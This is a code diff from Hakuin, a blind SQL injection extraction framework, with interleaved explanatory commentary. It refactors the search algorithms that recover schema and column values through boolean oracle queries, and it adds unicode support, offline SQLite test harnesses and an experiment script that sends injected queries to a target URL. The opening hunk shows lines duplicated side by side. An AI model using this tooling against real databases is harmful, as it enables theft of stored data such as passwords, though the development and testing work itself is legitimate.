if self._query(ctx, left): if self._query(ctx, left):
return self._search(ctx, left) return self._search(ctx, left)
else:
return self._search(ctx, right) return self._search(ctx, right)
def _query(self, ctx, values): def _query(self, ctx, values):
@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm):
if self.correct is None: if self.correct is None:
query_string = self.query_cb(ctx, values) query_string = self.query_cb(ctx, values)
return self.requester.request(ctx, query_string) return self.requester.request(ctx, query_string)
else:
return self.correct in values return self.correct in values
@@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm):
         '''Runs the search algorithm.

         Params:
-            ctx (Context): inference context
+            ctx (Context): extraction context

         Returns:
             value|None: inferred value or None on fail
         '''
         self.n_queries = 0
-
         return self._search(ctx, self.tree, in_tree=self.in_tree)
@@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm):
         '''Tree search.

         Params:
-            ctx (Context): inference context
+            ctx (Context): extraction context
             tree (utils.huffman.Node): Huffman tree to search
             in_tree (bool): True if the correct value is known to be in the tree
@@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm):
         if self._query(ctx, tree.left.values()):
             return self._search(ctx, tree.left, True)
-        else:
-            if tree.right is None:
-                return None
-            return self._search(ctx, tree.right, in_tree)
+
+        if tree.right is None:
+            return None
+
+        return self._search(ctx, tree.right, in_tree)


     def _query(self, ctx, values):
@@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm):
         if self.correct is None:
             query_string = self.query_cb(ctx, values)
             return self.requester.request(ctx, query_string)
-        else:
-            return self.correct in values
+        return self.correct in values
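The refactored integer search above works in two phases: exponentially double the upper bound until the secret value falls inside the range, then binary-search that range. The following minimal, self-contained sketch reproduces the pattern; `oracle(n)` stands in for the requester/query-callback pair and is not Hakuin's actual API.

# Minimal sketch of the two-phase search: exponential range expansion
# followed by binary search. `oracle(n)` models a blind-SQLi predicate
# such as "secret < n" (illustrative stand-in, not Hakuin's API).
def find_int(oracle, lower=0, upper=8):
    # Phase 1: double the upper bound until the secret lies in [lower, upper).
    while not oracle(upper):
        lower, upper = upper, upper * 2
    # Phase 2: classic binary search on the discovered range.
    while upper - lower > 1:
        middle = (lower + upper) // 2
        if oracle(middle):
            upper = middle
        else:
            lower = middle
    return lower

secret = 42
assert find_int(lambda n: secret < n) == 42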

@@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__))
 DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
 DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')

+ASCII_MAX = 0x7f
+UNICODE_MAX = 0x10ffff
 CHARSET_ASCII = [chr(x) for x in range(128)] + ['</s>']
-CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + ['</s>']
 EOS = '</s>'
 SOS = '<s>'
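The new ASCII_MAX and UNICODE_MAX bounds fit the commit's unicode support: a character that is not in the ASCII charset can still be recovered by binary-searching its code point. This is a hedged sketch of that idea, assuming a predicate of the form "unicode(substr(col, i, 1)) < n"; the helper name and oracle are illustrative, not Hakuin's actual API.

# Hedged sketch: numeric fallback search over code points up to U+10FFFF.
ASCII_MAX = 0x7f
UNICODE_MAX = 0x10ffff

def find_codepoint(oracle, lower=0, upper=UNICODE_MAX + 1):
    # Invariant: lower <= secret code point < upper.
    while upper - lower > 1:
        middle = (lower + upper) // 2
        if oracle(middle):
            upper = middle
        else:
            lower = middle
    return chr(lower)

secret = ord('Ħ')  # U+0126, outside the ASCII range
assert find_codepoint(lambda n: secret < n) == 'Ħ'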

@@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs'))
 class OfflineRequester(Requester):
     '''Offline requester for testing purposes.'''

-    def __init__(self, db):
+    def __init__(self, db, verbose=False):
         '''Constructor.

         Params:
             db (str): name of an .sqlite DB in the "dbs" dir
+            verbose (bool): flag for verbose prints
         '''
         db_file = os.path.join(DIR_DBS, f'{db}.sqlite')
         assert os.path.exists(db_file), f'DB not found: {db_file}'
         self.db = sqlite3.connect(db_file).cursor()
+        self.verbose = verbose
         self.n_queries = 0

     def request(self, ctx, query):
         self.n_queries += 1
         query = f'SELECT cast(({query}) as bool)'
-        return bool(self.db.execute(query).fetchone()[0])
+        res = bool(self.db.execute(query).fetchone()[0])
+
+        if self.verbose:
+            print(f'"{ctx.s}"\t{res}\t{query}')
+
+        return res

     def reset(self):
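The wrapped query in request() is what turns an arbitrary sub-query into a boolean oracle: the sub-query is embedded in SELECT cast((...) as bool) so every probe reduces to a single True/False. A self-contained illustration against an in-memory SQLite DB; the toy table is made up for the example.

# Standalone illustration of the oracle evaluation performed in request().
import sqlite3

db = sqlite3.connect(':memory:').cursor()
db.execute('CREATE TABLE users (name TEXT)')
db.execute("INSERT INTO users VALUES ('admin')")

inner = "SELECT count(*) FROM users WHERE name LIKE 'a%'"
print(bool(db.execute(f'SELECT cast(({inner}) as bool)').fetchone()[0]))  # True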

7
tests/dbs/unicode.json Normal file

@@ -0,0 +1,7 @@
+{
+    "Ħ€ȽȽ© ŴǑȒȽƉ": [
+        {
+            "Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"
+        }
+    ]
+}
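The unicode.sqlite fixture below is presumably generated from this JSON; the repository's generation script is not shown, but a minimal conversion would look like this sketch (connect to 'tests/dbs/unicode.sqlite' instead of ':memory:' to materialize the file).

# Hedged sketch: materialize a JSON fixture as a test SQLite DB.
import json
import sqlite3

data = json.loads('{"Ħ€ȽȽ© ŴǑȒȽƉ": [{"Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"}]}')
db = sqlite3.connect(':memory:')
for table, rows in data.items():
    columns = ', '.join('"%s" TEXT' % col for col in rows[0])
    db.execute('CREATE TABLE "%s" (%s)' % (table, columns))
    for row in rows:
        marks = ', '.join('?' for _ in row)
        db.execute('INSERT INTO "%s" VALUES (%s)' % (table, marks), list(row.values()))
db.commit()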

BIN
tests/dbs/unicode.sqlite Normal file

Binary file not shown.

@@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json')
 def main():
     assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [<table> <column>]'

-    requester = OfflineRequester(db='large_content')
+    requester = OfflineRequester(db='large_content', verbose=False)
     ext = Extractor(requester=requester, dbms=SQLite())

     if len(sys.argv) == 3:
@@ -60,58 +60,58 @@ if __name__ == '__main__':
 # {
 #     "users": {
 #         "username": [
-#             42124,
-#             5.738182808881624
+#             42125,
+#             5.738319030104891
 #         ],
 #         "first_name": [
-#             27901,
-#             4.882919145957298
+#             27902,
+#             4.883094154707735
 #         ],
 #         "last_name": [
-#             32701,
-#             5.344173884621671
+#             32702,
+#             5.344337310017977
 #         ],
 #         "sex": [
-#             1608,
-#             0.3216
+#             1609,
+#             0.3218
 #         ],
 #         "email": [
-#             78138,
-#             3.7532062058696383
+#             78139,
+#             3.7532542389163743
 #         ],
 #         "password": [
-#             137115,
-#             4.28484375
+#             137116,
+#             4.284875
 #         ],
 #         "address": [
-#             86872,
-#             2.1946795341434453
+#             86873,
+#             2.1947047975140843
 #         ]
 #     },
 #     "posts": {
 #         "text": [
-#             409302,
-#             4.312482220185226
+#             409303,
+#             4.312492756371759
 #         ]
 #     },
 #     "comments": {
 #         "text": [
-#             346373,
-#             3.920464063384267
+#             346374,
+#             3.9204753820033957
 #         ]
 #     },
 #     "products": {
 #         "name": [
-#             491174,
-#             3.8737341871983344
+#             491175,
+#             3.873742073882457
 #         ],
 #         "category": [
-#             6721,
-#             0.42975893599334997
+#             6753,
+#             0.4318051026280453
 #         ],
 #         "description": [
-#             966309,
-#             3.2259549579023976
+#             966310,
+#             3.2259582963324007
 #         ]
 #     }
 # }

@@ -27,3 +27,8 @@ def main():

 if __name__ == '__main__':
     main()
+
+
+# Expected results:
+# Total requests: 27376
+# Average RPC: 2.2098805295447206

@ -25,13 +25,17 @@ class R(Requester):
r = requests.get(url) r = requests.get(url)
assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}' assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}'
# print(ctx.s, r.status_code == 200, query)
return r.status_code == 200 return r.status_code == 200
def main(): def main():
assert len(sys.argv) == 4, 'python3 experiment_generic_db.py <dbms> <table> <column>' assert len(sys.argv) >= 2, 'python3 experiment_generic_db.py <dbms> [<table> <column>]'
_, dbms_type, table, column = sys.argv argv = sys.argv + [None, None]
_, dbms_type, table, column = argv[:4]
allowed = ['sqlite', 'mysql'] allowed = ['sqlite', 'mysql']
assert dbms_type in allowed, f'dbms must be in {allowed}' assert dbms_type in allowed, f'dbms must be in {allowed}'
@ -39,10 +43,12 @@ def main():
dbms = SQLite() if dbms_type == 'sqlite' else MySQL() dbms = SQLite() if dbms_type == 'sqlite' else MySQL()
ext = Extractor(requester, dbms) ext = Extractor(requester, dbms)
res = ext.extract_schema(metadata=True) if table is None:
print(json.dumps(res, indent=4)) res = ext.extract_schema(strategy='model', metadata=True)
res = ext.extract_column(table, column) print(json.dumps(res, indent=4))
print(json.dumps(res, indent=4)) else:
res = ext.extract_column(table, column)
print(json.dumps(res, indent=4))
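The argv-padding idiom above is worth isolating: appending None placeholders lets a single unpack serve both the schema-only and the single-column invocations. A minimal sketch follows; the usage string is illustrative.

# Pad argv with None so one unpack handles optional positional arguments.
import sys

assert len(sys.argv) >= 2, 'usage: experiment_generic_db.py <dbms> [<table> <column>]'
argv = sys.argv + [None, None]
_, dbms_type, table, column = argv[:4]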

@ -0,0 +1,29 @@
import json
import logging
from hakuin.dbms import SQLite
from hakuin import Extractor
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='large_content')
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(metadata=True)
print(json.dumps(res, indent=4))
res_len = sum([len(table) for table in res])
res_len += sum([len(column) for table, columns in res.items() for column in columns])
print('Total requests:', requester.n_queries)
print('Average RPC:', requester.n_queries / res_len)
if __name__ == '__main__':
main()

28
tests/test_unicode.py Normal file

@ -0,0 +1,28 @@
import json
import logging
import hakuin
from hakuin import Extractor
from hakuin.dbms import SQLite
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='unicode', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(strategy='binary')
print(res)
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
if __name__ == '__main__':
main()